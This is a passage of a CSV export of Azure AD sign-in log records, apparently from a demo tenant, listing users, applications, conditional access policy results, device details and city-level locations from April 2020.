'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a2626421400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d3a3c86e-d6a1-4323-9bc0-1a2626421400,SigninLogs,Sucess,41.90428925,-85.99833679
+127,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:09.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,03db49e5-0381-4074-9022-c60d1c914e7f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",687149c8-f736-4452-b785-99f3224e1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,687149c8-f736-4452-b785-99f3224e1700,SigninLogs,Sucess,36.6404686,-78.26995087
+128,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,47f31b04-66db-4b7d-a6fc-d4e86aff6bcd,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6052c246-a70b-451d-9677-f5a7663b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a7663b0800,SigninLogs,Sucess,36.6404686,-78.26995087
+129,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a380d6a5-cf50-4273-b5ef-8d3cae1c748e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",86807d56-c656-4319-9bdc-577e04c61600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,86807d56-c656-4319-9bdc-577e04c61600,SigninLogs,Sucess,36.6404686,-78.26995087
+130,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:51.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",4c26ff63-9053-4f52-8a36-491b20ff0e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4c26ff63-9053-4f52-8a36-491b20ff0e00,SigninLogs,Sucess,51.4458313,-0.969720006
+131,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:04.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a62fe0f8-bb3a-4e36-b73d-1246421ff718,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",459ca702-517f-41c3-88f0-2f42572e0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,459ca702-517f-41c3-88f0-2f42572e0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+132,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,161ee6d6-0670-4323-98cc-291717e1c049,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e073edf9-f5bb-4bea-bfc3-4266ba7d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e073edf9-f5bb-4bea-bfc3-4266ba7d1400,SigninLogs,Sucess,33.7984581,-84.38828278
+133,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aa62ffc3-662e-4324-91da-2d2f71a0404e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ef5316a-deee-4f03-8fd7-4abf4fb11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5ef5316a-deee-4f03-8fd7-4abf4fb11300,SigninLogs,Sucess,41.90428925,-85.99833679
+134,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:38.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f53b786b-165f-4251-a8b8-1d165715d9e1,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA 